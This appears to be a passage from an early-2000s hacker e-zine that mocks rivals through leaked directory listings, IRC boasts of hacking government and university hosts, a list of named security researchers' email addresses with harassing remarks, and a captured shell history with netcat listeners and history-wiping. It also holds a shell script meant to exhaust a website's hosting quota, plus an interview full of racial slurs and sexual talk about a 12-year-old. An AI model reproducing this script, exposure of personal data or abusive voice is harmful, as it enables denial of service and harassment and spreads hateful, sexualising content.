-rwxr-xr-x 1 root wheel 50 mp_Budswell Stoner.previous
-rwxr-xr-x 1 root wheel 17488 msiexec.ex_
drwxr-xr-x 1 root wheel 32768 msme
drwxr-xr-x 1 root wheel 32768 na2002
-rwxr-xr-x 1 root wheel 0 nav80try.exe
-rwxr-xr-x 1 root wheel 4869253 netzero.exe
-rwxr-xr-x 1 root wheel 10001569 nortonpersonalfirewall2001_2.5_en-us.rar
-r-xr-xr-x 1 root wheel 34420 ntdetect.com
-rwxr-xr-x 1 root wheel 13196572 nticdmaker508full[1].zip
-r-xr-xr-x 1 root wheel 213904 ntldr
drwxr-xr-x 1 root wheel 32768 officeinst
drwxr-xr-x 1 root wheel 32768 opennap
-rwxr-xr-x 1 root wheel 598 os581474.bin
drwxr-xr-x 1 root wheel 32768 ps.tmp
-rwxr-xr-x 1 root wheel 147456 pscp-x86.exe
-rwxr-xr-x 1 root wheel 8076 rcdet.txt
-rwxr-xr-x 1 root wheel 174460928 rq_ext1.mpg
drwxr-xr-x 1 root wheel 32768 sb3
-rwxr-xr-x 1 root wheel 32059 self-igniting.txt
drwxr-xr-x 1 root wheel 32768 shockwave4kc
-rwxr-xr-x 1 root wheel 703368 shockwaveinstaller.exe
-rwxr-xr-x 1 root wheel 258668 shoutcast-1-8-3-windows.exe
drwxr-xr-x 1 root wheel 32768 snort-1.7-win32-static
drwxr-xr-x 1 root wheel 32768 sol7-pkgs
drwxr-xr-x 1 root wheel 32768 sony
drwxr-xr-x 1 root wheel 32768 source
drwxr-xr-x 1 root wheel 32768 sta
drwxr-xr-x 1 root wheel 32768 stuf
drwxr-xr-x 1 root wheel 32768 tp2002
-r-xr-xr-x 1 root wheel 379906 txtsetup.sif
drwxr-xr-x 1 root wheel 32768 untitled
drwxr-xr-x 1 root wheel 32768 vctut
drwxr-xr-x 1 root wheel 32768 wftpd
-rwxr-xr-x 1 root wheel 2412 whatsnew.txt
-rwxr-xr-x 1 root wheel 3644834 winamp2666_u2.exe
drwxr-xr-x 1 root wheel 32768 xinstall
drwxr-xr-x 1 root wheel 32768 zoo
drwxr-xr-x 1 root wheel 32768 zsnesw
<r0b1nleech> We didn't start the fire is a GAY song.
<jobe> should i show my special porn dir?
<jobe> let me grep out a few things in the ls
$ ls -al porn
DUE TO THE DISGUSTING NATURE OF THIS LS, WE HAVE FORBID OURSELVES TO SHOW IT.
<r0b1nleech> Disgusting..
<r0b1nleech> You are sick.
<jobe> :D:D:D:D:D:D:D
<r0b1nleech> Chunks of caviar, on the floor, and on my leg.
$ w
USER TTY FROM LOGIN@ IDLE WHAT
root v0 - Wed04PM 2days xinit /root/.xinitrc -
root p0 :0.0 Wed04PM 6:49 csh
root p1 :0.0 Wed04PM 5:11 ssh -C -l jobe -c 3des
root p2 :0.0 Wed06PM 7:58 vi sparc-solaris
root p3 :0.0 Wed06PM 4:06 ssh -C -l jobe -c 3des
root p4 :0.0 Thu05AM 1day vi test_sol_login.c
root p5 :0.0 Thu05AM 4:06 bash
root p6 :0.0 Thu01PM 4:12 csh
root p7 :0.0 Thu02PM 1day csh
root p8 :0.0 Fri11AM 4:06 csh
r0b1n v1 - Fri11AM - w
$ ls -al /root
drwxr-xr-x 33 root wheel 4096 .
drwxr-xr-x 22 root wheel 512 ..
-rw------- 1 root wheel 191 .Xauthority
-rw------- 1 root wheel 625 .althearc
-rw------- 1 root wheel 63035 .bash_history
-rw-r--r-- 2 root wheel 802 .cshrc
drwxr-xr-t 2 root wheel 512 .esd
drwxr-xr-x 2 root wheel 512 .ethereal
drwxr-xr-x 4 root wheel 512 .gnapster
-rw------- 1 root wheel 3013 .history
-rw-r--r-- 1 root wheel 142 .klogin
drwx------ 2 root wheel 512 .kza
-rw-r--r-- 1 root wheel 297 .login
drwxr-xr-x 3 root wheel 512 .mozilla
drwx------ 4 root wheel 512 .netscape
-rw------- 1 root wheel 44 .poppyrc
-rw-r--r-- 2 root wheel 251 .profile
drwx------ 2 root wheel 512 .ssh
drwxr-xr-x 2 root wheel 512 .ssh2
-rw-r--r-- 1 root wheel 5101 .suids
lrwxr-xr-x 1 root wheel 12 .wine -> /stuff/.wine
-rw-r--r-- 1 root wheel 464 .wmpop3rc
drwxr-xr-x 2 root wheel 512 .xine
-rwxr-xr-x 1 root wheel 108 .xinitrc
drwxr-xr-x 4 root wheel 512 .xmms
-rwxr-xr-x 1 root wheel 108 .xsession
drwxr-xr-x 2 root wheel 512 7350cfingerd
-rw-r--r-- 1 root wheel 19713 7350cfingerd-0.0.4.tar.gz
-rw-r--r-- 1 root wheel 414316 CURRENT.tar.gz
-rw-r--r-- 1 root wheel 3840 Changelog
-rw-r--r-- 1 root wheel 4781 Collector-1.0.tar.gz
-rw-r--r-- 1 root wheel 90 FILE_ID.DIZ
drwxr-xr-x 5 root wheel 512 GNUstep
-rw-r--r-- 1 root wheel 7655 Hunter-1.2.tar.gz
-rw-r--r-- 1 root wheel 7011 ICMP-Tunnel_P4-1.0.tar.gz
drwx------ 2 root wheel 512 Mail
-rw-r--r-- 1 root wheel 3805 Makefile
-rw-r--r-- 1 root wheel 2252 README
-rw-r--r-- 1 root wheel 6246 Searcher-8.0.tar.gz
-rw-r--r-- 1 root wheel 16744 Smeagol-4.4.4.tar.gz
drwxr-xr-x 3 root wheel 1024 StMichael_LKM-0.08
-rw-r--r-- 1 root wheel 30545 StMichael_LKM-0.08.tar.gz
-rw-r--r-- 1 root wheel 903514 V8.pdf
-rw------- 1 root wheel 864256 XF86_SVGA.core
-rwxr-xr-x 1 root wheel 6415 abo10
-rw-r--r-- 1 root wheel 224 abo10.c
-rwxr-xr-x 1 root wheel 50589 abo2
-rw-r--r-- 1 root wheel 381 abo2.c
-rwxr-xr-x 1 root wheel 4461 abo2.new
-rwxr-xr-x 1 root wheel 4606 abo3
-rw-r--r-- 1 root wheel 433 abo3.c
-rwxr-xr-x 1 root wheel 4546 abo3.new
-rwxr-xr-x 1 root wheel 4843 abo4
-rw-r--r-- 1 root wheel 495 abo4.c
-rwxr-xr-x 1 root wheel 6228 abo5
-rw-r--r-- 1 root wheel 632 abo5.c
-rw------- 1 root wheel 294912 abo5.core
-rwxr-xr-x 1 root wheel 15470 abo6
-rw-r--r-- 1 root wheel 371 abo6.c
-rw------- 1 root wheel 8329 abo6.ktrace
-rwxr-xr-x 1 root wheel 4580 abo6.new
-rwxr-xr-x 1 root wheel 6134 abo7
-rw-r--r-- 1 root wheel 90 abo7.c
-rwxr-xr-x 1 root wheel 8404 abo8
-rw-r--r-- 1 root wheel 252 abo8.c
-rwxr-xr-x 1 root wheel 6176 abo9
-rw-r--r-- 1 root wheel 191 abo9.c
drwxr-xr-x
3 root wheel 512 adore
-rw-r--r-- 1 root wheel 14749 adore-0.42.tgz
-rw-r--r-- 1 root wheel 46403 b00s
-rw-r--r-- 1 root wheel 0 blah
-rw-r--r-- 1 root wheel 258 bll
-rw-r--r-- 1 root wheel 6401 boink.c
-rw-r--r-- 1 root wheel 445006 bz.hosts
-rwxr-xr-x 1 root wheel 4235 call
-rw-r--r-- 1 root wheel 32 call.c
-rw-r--r-- 1 root wheel 3339 clear-1.3.tar.gz
-rwxr-xr-x 1 root wheel 12239 cmsd
-rw-r--r-- 1 root wheel 1872 cnt-svr-filetransfer.tar.gz
-rw-r--r-- 1 root wheel 1438 daemonshell.tar.gz
drwxr-xr-x 2 root wheel 512 data
-rw-r--r-- 1 root wheel 273 done.up
-rw-r--r-- 1 root wheel 635195 edu
-rwxr-xr-x 1 root wheel 6018 er
-rw-r--r-- 1 root wheel 2845 errors
-rwxr-xr-x 1 root wheel 11146 ex_abo2
-rw-r--r-- 1 root wheel 1044 ex_abo2.c
-rwxr-xr-x 1 root wheel 4925 ex_abo3
-rw-r--r-- 1 root wheel 768 ex_abo3.c
-rwxr-xr-x 1 root wheel 4957 ex_abo4
-rw-r--r-- 1 root wheel 844 ex_abo4.c
-rwxr-xr-x 1 root wheel 10856 ex_abo5
-rw-r--r-- 1 root wheel 1272 ex_abo5.c
-rw------- 1 root wheel 21092 ex_abo5.out
-rwxr-xr-x 1 root wheel 4888 ex_abo6
-rw-r--r-- 1 root wheel 1268 ex_abo6.c
-rw------- 1 root wheel 16005 ex_abo6.out
-rwxr-xr-x 1 root wheel 4844 ex_abo7
-rw-r--r-- 1 root wheel 1183 ex_abo7.c
-rw------- 1 root wheel 15698 ex_abo7.out
-rwxr-xr-x 1 root wheel 5175 ex_abo8
-rw-r--r-- 1 root wheel 1358 ex_abo8.c
-rw------- 1 root wheel 8023 ex_abo8.out
-rwxr-xr-x 1 root wheel 4536 ex_fsx6
-rw-r--r-- 1 root wheel 181 ex_fsx6.c
-rw-r--r-- 1 root wheel 1390 exec_race.c
-rw-r--r-- 1 root wheel 5475 fawx.c
drwxr-xr-x 2 root wheel 512 fhffp
-rw-r--r-- 1 root wheel 0 file
-rw-r--r-- 1 root wheel 2937 fingerd-fileserver.tar.gz
-rwxr-xr-x 1 root wheel 4685 forktest
-rw-r--r-- 1 root wheel 239 forktest.c
-rwxr-xr-x 1 root wheel 6083 fstring
-rw-r--r-- 1 root wheel 91 fstring.c
-rwxr-xr-x 1 root wheel 7999 fsx6
-rw-r--r-- 1 root wheel 413 fsx6.c
-rwxr-xr-x 1 root wheel 6134 gabo7
-rw-r--r-- 1 root wheel 1790 gdb.txt
-rw-r--r-- 1 root wheel 11629 generic.h
-rw-r--r-- 1 root wheel 8501 ici.out
-rw-r--r-- 1 root wheel 11852 in.telnetd
drwxr-xr-x 2 root wheel 512 iob
-rw-r--r-- 1 root wheel 5899 iob-0.1.tar.gz
-rwxr-xr-x 1 root wheel 6499 killwin
-rw-r--r-- 1 root wheel 1771 killwin.c
-rw-r--r-- 1 root wheel 29 kr.hosts
-rw------- 1 root wheel 72 ktrace.out
drwxr-xr-x 2 root wheel 512 kza-0.401
drwx------ 2 root wheel 512 kza-downloads
-rw-r--r-- 1 root wheel 294517 kza.linux.tar.gz
-rwxr-xr-x 1 root wheel 9911 loginex
-rw-r--r-- 1 root wheel 7650 loginex.c
drwxr-xr-x 2 root wheel 512 mtv
-rw-r--r-- 1 root wheel 258322 mtv-1.0.8.0.tar.gz
-rw-r--r-- 1 root wheel 75267 nc110.tgz
-rw-r--r-- 1 root wheel 2645 netcat.blurb
-rw-r--r-- 1 root wheel 58553 netcat.c
drwx------ 7 root wheel 512 ninja-1.5.7
-rw-r--r-- 1 root wheel 693696 ninja-1.5.7.tar.gz
-rw-r--r-- 1 root wheel 693696 ninja-src.tar.gz
drwxr-xr-x 6 root wheel 6656 openssh-3.0.2p1
-rw-r--r-- 1 root wheel 781092 openssh-3.0.2p1.tar.gz
-rwxr-xr-x 1 root wheel 4671 passprog
-rw-r--r-- 1 root wheel 479 passprog.c
-rwxr-xr-x 1 root wheel 6270 passtest
-rw-r--r-- 1 root wheel 2004 passtest.c
-rw------- 1 root wheel 11650 passtest.out
-rw-r--r-- 1 root wheel 1684 paz-1.0.tar.gz
-rwxr-xr-x 1 root wheel 9477 pepsi
-rw-r--r-- 1 root wheel 7215 pepsi.c
-rwxr-xr-x 1 root wheel 6267 pinger
-rw-r--r-- 1 root wheel 3013 pinger.c
-rw-r--r-- 1 root wheel 2770 probe-2.3.tar.gz
-rw-r--r-- 1 root wheel 54184 qcrack-1.02.tar.gz
-rw-r--r-- 1 root wheel 121423 roseposter.jpg
-rwxr-xr-x 1 root wheel 5116 sc
-rw-r--r-- 1 root wheel 327 sc.c
drwxr-xr-x 2 root wheel 512 screamingCobra-1.04
drwxr-xr-x 2 root wheel 512 scripts
-rwxr-xr-x 1 root wheel 4352 sizint
-rw-r--r-- 1 root wheel 101 sizint.c
-rw-r--r-- 1 root wheel 378 sol-ffcore.sh
-rw-r--r-- 1 root wheel 12091 solsparc_rpc.cmsd.c
-rwxr-xr-x 1 root wheel 9832 sparc_login
-rw-r--r-- 1 root wheel 8598 sparc_login.c
-rw------- 1 root wheel 299008 sparc_login.core
-rwxr-xr-x 1 root wheel 24444 sparc_login2
-rw------- 1 root wheel 299008 sparc_login2.core
drwxr-xr-x 4 root wheel 3072 ssh-1.2.32
-rw-r--r-- 1 root wheel 1030240 ssh-1.2.32.tar.gz
drwxr-xr-x 5 root wheel 1024 ssh-2.4.0
-rw-r--r-- 1 root wheel 1911375 ssh-2.4.0.tar.gz
-rw-r--r-- 1 root wheel 14368 statdx2.c
-rw-r--r-- 1 root wheel 5856 statdx2.tar.gz
-rwxr-xr-x 1 root wheel 8549 stupidh
-rwxr-xr-x 1 root wheel 7797 syndrop
-rw-r--r-- 1 root wheel 7900 syndrop.c
-rwxr-xr-x 1 root wheel 5086 t
-rw-r--r-- 1 root wheel 6360 t-shirt-4.0.tar.gz
-rw-r--r-- 1 root wheel 2123 t3.c
-rw-r--r-- 1 root wheel 2843 tao.c
-rw-r--r-- 1 root wheel 34692 targa.c
-rwxr-xr-x 1 root wheel 4351 test
-rw-r--r-- 1 root wheel 303 test.c
-rw------- 1 root wheel 282624 test.core
-rwxr-xr-x 1 root wheel 12267 test_sol_login
-rw-r--r-- 1 root wheel 13357 test_sol_login.c
-rwxr-xr-x 1 root wheel 5875 testsc
-rw-r--r-- 1 root wheel 864 testsc.c
-rwxr-xr-x 1 root wheel 8322 testsh
-rw-r--r-- 1 root wheel 120 testsh.c
-rwxr-xr-x 1 root wheel 4579 teststat
-rw-r--r-- 1 root wheel 231 teststat.c
-rw-r--r-- 1 root wheel 68401 thc-uht1.tgz
-rw-r--r-- 1 root wheel 11936 udpd
-rw-r--r-- 1 root wheel 3330 udpsh.tar.gz
drwxr-xr-x 2 root wheel 512 udpshell
-rw-r--r-- 1 root wheel 1124 w00p
drwxr-xr-x 3 root wheel 512 work
-rwxr-xr-x 1 root wheel 13720 x2
drwxr-xr-x 7 root wheel 1024 xpdf-1.00
-rw-r--r-- 1 root wheel 397750 xpdf-1.00.tar.gz
-rw------- 1 root wheel 839680 xterm.core
drwxr-xr-x 2 root wheel 512 zap3
-rw-r--r-- 1 root wheel 3176 zap3.tar.gz
<r0b1nleech> I can't help but notice but what is that kr.hosts file? And
+ bz.hosts?
<jobe> those are lp's, f0r wh3n i h4ck shit
<jobe> i use udpshell on everything i own
<r0b1nleech> Looks like you are a fan of gera (a w00w00 patriot) and his
+ advanced buffer overflow challenges.
<jobe> i've mastered all of them!
<jobe> sparc_login.c is my solaris login exploit
<jobe> i hack .gov's and .edu's with it
<jobe> well me and jduck
<jduck> i hacked the entire internet with my dtspcd and jobe's solaris login
+ exploit.
$ ls -al ~j
drwxr-xr-x 11 j j 2048 .
drwxr-xr-x 23 root wheel 512 ..
-rw-r--r-- 1 root jduck 1735738 .pw.pu
drwx------ 2 j j 512 .ssh
-rw-r--r-- 1 j j 171542 2k.more
-rw-r--r-- 1 j j 22605 600.more
drwxr-xr-x 2 root wheel 1024 ADMmutate-0.8.4
-rw-r--r-- 1 j j 29108 ADMmutate-0.8.4.tar.gz
drwx------ 2 root wheel 512 ASMCODES-1.0.2
-rw-r--r-- 1 j j 2526 ChangeLog
drwxr-xr-x 2 1852 25 512 ILINXR.install
-rw-r--r-- 1 root j 15000000 Patriots.VS.Steelers.AFC.Chapionship.DiVX.CD1.001.r00
-rw-r--r-- 1 root j 15000000 Patriots.VS.Steelers.AFC.Chapionship.DiVX.CD1.001.r01
-rw-r--r-- 1 root j 15000000 Patriots.VS.Steelers.AFC.Chapionship.DiVX.CD1.001.r02
-rw-r--r-- 1 root j 15000000 Patriots.VS.Steelers.AFC.Chapionship.DiVX.CD1.001.r03
-rw-r--r-- 1 root j 319488 Patriots.VS.Steelers.AFC.Chapionship.DiVX.CD1.001.r04
-rw-r--r-- 1 j j 469 README.513
-rw-r--r-- 1 j j 8250103 VSC513.tar.Z
-rw-r--r-- 1 j j 7069 VSCR513.ps.Z
-rw-r--r-- 1 j j 103743 VSCU513.ps.Z
-rw-r--r-- 1 j j 14101 asmcodes-1.0.2.tar.gz
-rw------- 1 root j 32333 b00
-rw-r--r-- 1 j j 7192 b1nd
-rw-r--r-- 1 j j 18436 bb
drwxr-xr-x 5 root wheel 1024 binutils-020210
-rw-r--r-- 1 root wheel 57057280 binutils.tar
-rwxr-x--- 1 j j 851 cisco-tools
-rw-r--r-- 1 j j 243312 core
-rw-r--r-- 1 j j 1262996 dbx-sparc.gz
-rwxr-xr-x 1 root j 14012 discover
-rw-r--r-- 1 j j 3424 discover.c
-rw-r--r-- 1 root jduck 84967 edu.tld
-rwxr-xr-x 1 root j 6018 er
-rw-r--r-- 1 root j 3574 errors
drwx------ 18 220 1002 1024 gcc-teso
-rw-r--r-- 1 root j 14270640 gcc-teso.tar.gz
-rw-r--r-- 1 j j 9801816 gdb
-rwxr-xr-x 1 j j 334 get_pg.pl
-rw-r--r-- 1 root j 19214 hello
-rw-r--r-- 1 root j 83 hello.c
-rw-r--r-- 1 root j 864 hello.o
-rw-r--r-- 1 j j 1489931 includes.tar.gz
-rw-r--r-- 1 j j 2285137 jobe.wl
-rw-r--r-- 1 j j 24292 kcms_configure
-rw------- 1 root j 1028096 ld.core
-rw-r--r-- 1 root j 6036 ld.help
-rw-r--r-- 1 root wheel 6144813 linux-ar-405.tar.gz
-rwxr-xr-x 1 j j 29292 login
-rw-r--r-- 1 j j 1607 login.c
-rwxr-xr-x 1 root j 10099 loginex
-rw-r--r-- 1 j j 7871 loginex.c
-rw-r--r-- 1 j j 10344 m00
-rw-r--r-- 1 j j 75867384 ogls
-rw------- 1 j j 7918 pcnfsd-priv.tar.gz
drwxr-xr-x 2 root wheel 512 pcnfsd_remote
-rw-r--r-- 1 root jduck 66 pos.vuln.nets
drwxr-xr-x 2 root wheel 1024 qcrack-1.02
-rw-r--r-- 1 j j 1489778 sol7-includes.tar.gz
-r--r----- 1 j j 125208178 solaris-2.5.1+wings+ow.tar.gzd
-rwxr-xr-x 12 root wheel 512 src
-rw-r-xr-x 1 j j 229180 sshd
-rw-r--r-- 1 root j 45 stuff
-rwxr-xr-x 1 root j 4698 test_ws
-rw-r--r-- 1 root j 182 test_ws.c
-rw-r--r-- 1 root j 3330 udpsh.tar.gz
-rw-r--r-- 1 j j 10344 uf
-rw-r--r-- 1 j j 7028 uf.c
-rw-r--r-- 1 j j 9684 uf2
-rw-r--r-- 1 j j 9956 w00f
-rw-r--r-- 1 root j 2219 w00f.c
-rw-r--r-- 1 root j 44802 w00pe
-rw-r--r-- 1 root j 48755 w00pe2
-rw-r--r-- 1 j j 2272606 w00t
-rwxr-xr-x 1 j j 3568 wuftpfmt.pl
-rw-r--r-- 1 j j 9084 z2
-rw-r--r-- 1 root j 6458 z3.c
-rw-r--r-- 1 root j 8276 z3.o
-rw-r--r-- 1 root j 13793 z3.s
<jobe> w00t are all dtspcd hosts that i scanned out
<jobe> fresh for hacking
<jobe> .pw.uu is my sniff log that i keep hidden
<jobe> and Patriots.Vs.Steelers is really illegal porn
<r0b1nleech> Absolutely amazing.
# rm -rf / #
* >seifried #core02 wonders what chium forgot to p[atch
<nein> :|
<chiun> patch what?
<chiun> he must've sniffed my passwords
<seifried> you use cleartyext passwords? erk
<chiun> no
<chiun> i might have used a trojanned ssh client somewhere
<seifried> sux to be you
<seifried> how'd he get the root password for su though
<seifried> he/she/it
<chiun> no idea
<chiun> looking now
SignOff chiun: #cdc,#core02,#phrack,#teen (Ping Timeout: 400 Seconds)
.~e~----------------------------------------------------------~e~.
; *11* phrack staff demystified -- ThE UNiX TeRRoRiZt ;
`----------------------------------------------------------------'
ThE UNiX TeRRoRiZt brings you "PHRACK STAFF DEMYSTIFIED!":
----------------------------------------------------------
krahmer@cs.uni-potsdam.de <-- SuSe fire this guy!
edi@ganymed.org
tmogg@zigzag.pl
paul@boehm.org
crontab@netway.at
palmers@segfault.net
lorian@hert.org
caddis@hackforthedole.au.com <-- ISS fire this guy!
gaius@hert.org
scut@nb.in-berlin.de
hendy@teso.scene.at <-- I use your utmp cloaker!
just@segfault.net
halvar@gmx.de <-- Know Your Enemy!
zip@james.kalifornia.com <-- ISS fire this guy!
lists@immutec.com
acpizer@unseen.org
skyper@segfault.net <-- Hacks from segfault!
gamma@segfault.net
kil3r@hert.org
route@infonexus.com <-- Wrote a stupid book!
ThE UNiX TeRRoRiZt brings you "BONUS COVERAGE OF SKYPER HACKING!":
------------------------------------------------------------------
# cat ~skyper/.bash_history
ssh www.cnn.com
set
echo $RESOLV_HOST_CONF
ls
tar xfvz ADMglibcsh.tar.gz
strings resolv/res_hconf.c
./ADMglibcsh
ls -al /tmp/.sh
rm /tmp/.sh
ls
exit
top
su la-. lhendy
wow
echo "dfusLL#d" >doze.pwd
ls -al doze.pwd
chmod go-r doze.pwd
nc -l -p 1024
whereis nc
netcat
which nc
which netcat
netstat -ant
nc -l -p 31339 >ircs_coredump_cert.pem
unset HISTFILE
exit
.~e~----------------------------------------------------------~e~.
; *12* gobble blaster -- uncle m4v1s ;
`----------------------------------------------------------------'
#!/bin/sh
# own-gobbles
# by uncle m4v1s
#
# th1z skr1pt takez 4dv4ntag3 0f a kn0wn d0s 0n a gr0up
# 0f sekur1ty whiteh@ l4m3rz kn0wn as G0BBLEZ
# 3ver s1nce th31r l4m4ss st0rmh0st1ng pr0v1d3r wuz 0wned
# & fear1ng 4 th31r l1v3z th@ ADM wuz g01ng 2 k1ll th3m
# r0n1n struck up a d34l w/ a fr33 h0st3r.
# pr0blem 1z th0 they h4v3 qu0taz.
# run th1z, h3lp d0 ur part 2 erad1k8 l4m3rz!!!!!!
HTTP_DOMAIN=http://www.bugtraq.org
CMD_LYNX=lynx
CMD_WGET=wget
SITE_RESPONSE=1
DUMP_PATH=/tmp/GOBBLES
echo uncle m4v1s gonna buzt s0me headz
echo remember 2 add th1z skr1pt 2 ur m0nthly kr0nj0b
rm -rf $DUMP_PATH
$CMD_LYNX --dump http://www.bugtraq.org | grep exceeded > /dev/null 2>/dev/null
SITE_RESPONSE=$?
while [ $SITE_RESPONSE -eq 1 ] ;
do
echo sod0m1zing GOBBLES w/ a retr4kt4bl3 b4t0n ...
mkdir $DUMP_PATH
cd $DUMP_PATH
$CMD_WGET -r http://www.bugtraq.org
$CMD_LYNX --dump http://www.bugtraq.org | grep exceeded > /dev/null 2>/dev/null
SITE_RESPONSE=$?
done
rm -rf $DUMP_PATH
echo THE MONTH OF THE TURKEY HAS ENDED
.~e~----------------------------------------------------------~e~.
; *13* ~e~ 1nterv1ew with te4m OG -- uncle m4v1s ;
`----------------------------------------------------------------'
1nterv1ew with te4m OG
by uncle m4v1s
--------------
m4v1s: y*
ben-z: n1gg4 sh1t u kn0w wh4t-1m-sayn, sh1t sh1t... h0ld up lemme
hit th4 b0ng 1 m0re tym3 d4wg
m4v1s: 0k
[appr0xim8ly 15 minutez elapse]
[the s0und 0f c0ughing 1n the backgr0und]
m4v1s: u 0k br0?
ben-z: sh1t, juzt blazn s0me weed u kn0w wh4t-1m-sayn, my b0y
dap[gH] iz 0ver u kn0w wh4t-1m-sayn, l3mm3 get an0ther
huff be4 th1z fewl10 burnz all my kr0n1k
m4v1s: 0k
ben-z: ur n0t lyke the m4v1s that teach3z typ1ng r1ght?
m4v1s: n0 m0thafuq4 th@z y0ur ugly bl4q m0m... th1z 1nterv1ew
1znt ab0ut me anyh0w h0lm3z
m4v1s: u re4dy 2 beg1n d4wg?
ben-z: y4 u kn0w wh4t-1m-sayn 1t s33mz l1ke every tyme 1 get 0n 1rc
th1z h0 wr4pz her b1g f@ bl4ck l1pz ar0und my c0ck & w0nt
l3t g0 u kn0w wh4t-1m-sayn lol ;>
m4v1s: 0h, ok
ben-z: b3n 2 tha m0th3rfuckin Z BI0t[H
m4v1s: y4 w0rd n1gg4-4-re4l
ben-z: yiz0
m4v1s: 0k, br0 1 g0t a l0ng l1zt 0f pe0ple 1 n33d 2 retr13v3 sn1ffl0gz
fr0m & 1 a1nt g0t n0 sh3llskr1pt 4 1t y3t... s0 if u r try1ng 2
w4st3 my t1m3 1 th1nk 1m g0nn4 g0
ben-z: 0k s0rry m4v1s g0 ah34d
m4v1s: k s0... wh0 st4rt3d te4m 0g??
ben-z: s0 u kn0w 1tz like we uz3d 2 be gH, th4 gl0bal h3ll, th3n my
b01z m0st8d & m1ndphazr g0t r41d3d.. 1t wuz w31rd y0 cuz lyke
me & m0sth8d w0uld alw4yz B t4lkn 0n 1rc n sh1t,
u kn0w wh4t-1m-sayn, kuz 1 wuz 0nly 12 @ the t1me, 1 n3v3r h1t
n.e. 0f th@ puzzy u kn0w wh4t-1m-sayn, m0st8d, he wuz k1nda
l1ke my ment0r 0nl1ne 4 g1rlz.. sh333333333333t we uz3d 2
m4k3 j3nn1c1d3 kum lyke 5 tymez 4n h0ur 0n th4 c0nf....
he uz3d 2 t4lk l1ke he wuz z0rr0 & i wuz h1z truzty s1dek1q
R0Dr1g0, u kn0w wh4t-1m-sayn, but th@ wuz 4g3z 4g0
ben-z: anyh0w s0 we g0t th1z 1d34, kuz l1ke h4lf 0f us w3r3nt
3v3n 1n j41l aft3r the gH r41dz, u kn0w wh4t-1m-sayn, cuz lyke
we wuznt even 0ld enuff 2 get t1me in juv1e s0 we dec1ded 2
st4rt a sekur1ty kr3w & see 1f we k0uld h1t 1t up b1g...
&& m4ybe m4k3 s0me pes0z... we f1gur3d 1f we g0t enuf
kust0m3rz we k0uld buy hack.c0.za fr0m g0vernmentb01 4fter
1t g0t shut d0wn, & mayb3 3v3n h4v3 enuf $$$$$$ [gr33n] 2
g3t 4 p4tch 4 the AIDZqu1lt w1th m0st8d's n1ck & 4
skreensh0t 0f the wh1teh0use def4c3m3nt.
m4v1s: 1nterest1ng... s0 1 he4r u r quite the 4sm k0d3r n0w...
ben-z: ya br0... g0tta le4rn th@ sh1t, 1tz t1ght y0.... 3v3r s1nce
me & my b01 m0sth8d repl4c3d th3 sh3llk0d3 1n r0tshb.c, 1tz
b33n l1ke a gr1pp1ng f4sc1n4t10n 4 m3... u kn0w wh4t-1m-sayn,
g0tt4 get the k0d3 4 th4 BQ, y0 n1gg4z b k0ll3ktn s0me l00t,
ben-z B p0pn sum r00t, quick'n sl1de up & d0wn /var/l-0-g,
be sure 2 rem0ve th3 h0stname 0f any re4l 0g, burn'n s0me
k4$h, wgetting ad0re in2 tha /var/cache, s1tt1n 1ns1d3 sm0kn
sum cr4q fr0m my c0ke c4n, 0verfl0win y0ur staq gett1n
r00t by f00lin sgid m4n, y3h we b4ckd00rd b1tchx, s0 m0thrfuqr
WH4TZ n3xt??????/
m4v1s: heh... th4t wuz pr3tty t1ght br0
ben-z: y4 1 g0 4ll sp0nt4ne0uz w/my fre4ky-phr33-phl0... s0meth1n
th@ b4nsh33 taught me 4 wh1le baq 0n r00tab3ga...
1 k4nt b st0pd, u kn0w wh4t-1m-sayn, lyke a nucl34r p0wer
pl4nt, BEN 2 th4 m0therfuqn Z.
m4v1s: 0k d()g k4n u plz ch1ll...
ben-z: 0h sh1t itz B3n 2 tha M0THAFUCK1N ZZZZZZZZZZZZ
y3z h3r3 1 c0m3, h0pn 0n y0ur sw1tch, hustl1n u 0uta sp0rtzk4rz
w1th m0re f1n3ss3 th4n k3v1n p0uls3n
u n1gg4z be h8in on my 4g3 but th@z 0k kuz u kn0w 1 fuqd m4ryk4t3
& ashl3y 0ls0n
qu1ck 2 th3 dr0p, wh3n u see me j01n y0ur ch4nn3l 0n 1rc u kn0w 1m
pakn th4 9
try k0mp1l1ng msk4n & ch3ck1n 4 s0l4r1s b0x3z 1n k0r34 & n0w u kn0w
u just kr0ss3d th4 phuckn l1n3
1 w4lk in k0ur4ge0us fuq the p0lym0rph1k sh3llk0d3, 1 d0nt k4r3 1f
ur run'n sn0rt
1 g0t 5 b1tch3z h1tn me up 4 breazt 1mpl4ntz be4 1 even get th1nking
4b0ut th3 fukn ch1ld supp0rt
m4v1s: w8 up.. i
ben-z: BEN 2 THA M0THAFUCKINZ m0thrfuqr u kn0w-wh4t-1m-sayn..
m4v1s: n0 B1TCH U l1sten 2 me, m0re l1ke b3n-2-tha-m0thafukn-G lyke benji,
u fukn w4nn4be l1l-b0w-w0w m0thrfuqr
fuk u bitch 1ve h4d enuf 0f y0ur sh1t
t1m3 2 dump y0ur w4r3z and f1n4lz3 th1z ~el8 styleeeeeeeee ........
ben-z: wtf??????
m4v1s: ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 *****
m4v1s@~el8:/0wned/og# cat trivia.txt
Who wrote the first Linux kernel? : Linus Torvalds
What register points to the beginning of the stack in x86? : esp
Which direction does the stack grow in x86? : down
When a processor is said to be 8,16,32,64 bit etc, what bus is that number refering to? : data bus
How much memory is allocated for a char on a 32 bit processor? : 4 bytes
What does pgp stand for? : Pretty Good Protection
What is the highest bit key you can create with pgp? : 4096 bits
Who invented hexadecimal? : IBM
Hoe many bits in a byte? : 8
The x11 server runs on which port? : 6000
Is it morally and ethically right to eat animals? : NO*no*FUCK MEAT EATERS*nope*naw
what is the size of a tcp header in bytes? : 20
what is the size of a ip header in bytes? : 20
what type is NULL defined as? : void pointer
what is the site of a integer in bytes? : 4
What header file contains (struct sockaddr_in) : /usr/include/netinet/in.h
what is the most common localnet subnet ? : 192.168
list the 2 required layers of network transfers. : Link Layer, IP Protocol
what is the \"main\" initilization structure for WinAPI? : WinMain()
What does ARP stand for? : Address Resolution Protocol
What is the hax0r drink of choice? : pepsi
What will gH never do? : die
What does Spanning Tree Protocol Prevent? : Network Loops
Which Cisco IOS command displays the current software version? : show version
What baud rate do Cisco console ports operate at? : 9600
ATM (network protocol) stands for what? : Asynchronous Transfer Mode
Traceroute uses ICMP and what protocol? : udp
What is the Cisco Caralyst Operating System commonly known as? : CatOS
What does ACL stand for? : Access List
